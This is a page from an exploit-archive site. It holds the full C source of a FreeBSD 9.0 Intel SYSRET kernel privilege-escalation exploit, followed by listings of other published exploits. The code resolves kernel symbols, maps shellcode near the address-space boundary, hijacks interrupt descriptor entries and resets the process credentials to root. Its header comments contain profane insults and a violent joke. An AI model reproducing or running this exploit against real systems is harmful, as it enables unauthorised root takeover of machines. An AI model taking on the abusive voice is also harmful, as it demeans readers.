Search for hundreds of thousands of exploits

"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation"

Author

Exploit author

CurcolHekerLink

Platform

Exploit platform

freebsd

Release date

Exploit published date

2013-10-04

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
/*
 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
 * Author by CurcolHekerLink
 * 
 * This exploit based on open source project, I can make it open source too. Right?
 * 
 * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
 *
 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
 * if you would like next private exploit leakage, just mention @MamahhDedeh
 *
 * Some people may feel harmed when we release this exploit :))
 *
 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
#define TRIGGERSIZE 20
#define BOUNCESIZE 18

uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;

struct gate_descriptor * sidt()
{
	struct region_descriptor idt;
	asm ("sidt %0": "=m"(idt));
	return (struct gate_descriptor*)idt.rd_base;
}

u_long matchsym(char *symname)
{
	struct kld_sym_lookup ksym;
	ksym.version = sizeof (ksym);
	ksym.symname = symname;
	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
		perror("kldsym");
		exit(1);
	}
	return ksym.symvalue;
}

void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
	struct gate_descriptor *ip;
	ip = idt + idx;
	ip->gd_looffset = func;
	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
	ip->gd_ist = ist;
	ip->gd_xx = 0;
	ip->gd_type = typ;
	ip->gd_dpl = dpl;
	ip->gd_p = 1;
	ip->gd_hioffset = func>>16;
}

void payload()
{
	printf("[+] Woohoo!!!\n");
	exit(0);
}

void resetidt()
{
	struct thread *td;
	struct ucred *cred;
	struct gate_descriptor *idt = sidt();
	setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);	
	setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
	setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);
	
	asm ("mov %%gs:0, %0" : "=r"(td));
	
	cred = td->td_proc->p_ucred;
	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
	cred->cr_groups[0] = 0;
	
	asm ("swapgs; sysretq;" :: "c"(payload));
}

void resolving()
{
	Xdivp = (uintptr_t)matchsym("Xdiv");
	Xdbgp = (uintptr_t)matchsym("Xdbg");
	Xbptp = (uintptr_t)matchsym("Xbpt");
	Xoflp = (uintptr_t)matchsym("Xofl");
	Xbndp = (uintptr_t)matchsym("Xbnd");
	Xillp = (uintptr_t)matchsym("Xill");
	Xdnap = (uintptr_t)matchsym("Xdna");
	Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
	Xtssp = (uintptr_t)matchsym("Xtss");
	Xmissingp = (uintptr_t)matchsym("Xmissing");
	Xstkp = (uintptr_t)matchsym("Xstk");
	Xprotp = (uintptr_t)matchsym("Xprot");
	Xpagep = (uintptr_t)matchsym("Xpage");
	Xfpup = (uintptr_t)matchsym("Xfpu");
	Xalignp = (uintptr_t)matchsym("Xalign");
	Xmchkp = (uintptr_t)matchsym("Xmchk");
	Xxmmp = (uintptr_t)matchsym("Xxmm");
}

void trigger()
{
	printf("[+] Crotz...\n");
	uint64_t pagesize = getpagesize();
	uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
	mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
	if (mappedarea == MAP_FAILED) {
		perror("mmap (trigger)");
		exit(1);
	}

	char triggerpayload[] =
		"\xb8\x18\x00\x00\x00"
		"\x48\x89\xe3"
		"\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
		"\x0f\x05";

	uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
	memcpy(offset_addr, triggerpayload, TRIGGERSIZE);

	*(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
	printf("[+] Crotz...\n");
	char bouncepayload[] =
		"\x0f\x01\xf8"
		"\x48\x89\xdc"
		"\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
		"\xff\xe0";

	uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
	size_t bouncer_allocsize = pagesize;
	if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
		bouncer_allocsize += pagesize;
	if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
	{
		perror("mmap (bouncer)");
		exit(1);
	}
	memcpy(bouncer, bouncepayload, BOUNCESIZE);
	*(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
	((void (*)())offset_addr)();
}

int main(int argc, char *argv[])
{
	printf("[+] SYSRET FUCKUP!!\n");
	printf("[+] Start Engine...\n");
	resolving();
	printf("[+] Crotz...\n");
	trigger();
	return 0;
}
Release DateTitleTypePlatformAuthor
2020-07-07"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection"webappsphp"Mehmet Kelepçe"
2020-07-07"Sickbeard 0.1 - Remote Command Injection"webappshardwarebdrake
2020-07-07"Online Shopping Portal 3.1 - 'email' SQL Injection"webappsphpgh1mau
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
2020-07-07"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"remotexmlhyp3rlinx
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
Release DateTitleTypePlatformAuthor
2020-04-06"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting"webappsfreebsd"Matthew Aberegg"
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2019-12-30"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation"localfreebsd"Karsten König"
2019-12-30"FreeBSD-SA-19:02.fd - Privilege Escalation"localfreebsd"Karsten König"
2019-07-10"FreeBSD 12.0 - 'fd' Local Privilege Escalation"localfreebsdgr4yf0x
2016-01-25"FreeBSD SCTP ICMPv6 - Error Processing"dosfreebsdptsecurity
2015-01-29"FreeBSD - Multiple Vulnerabilities"dosfreebsd"Core Security"
2013-10-04"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation"localfreebsdCurcolHekerLink
2013-06-26"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)"localfreebsdMetasploit
2013-06-21"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation"localfreebsdHunger
Release DateTitleTypePlatformAuthor
2013-10-04"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation"localfreebsdCurcolHekerLink
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/28718/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.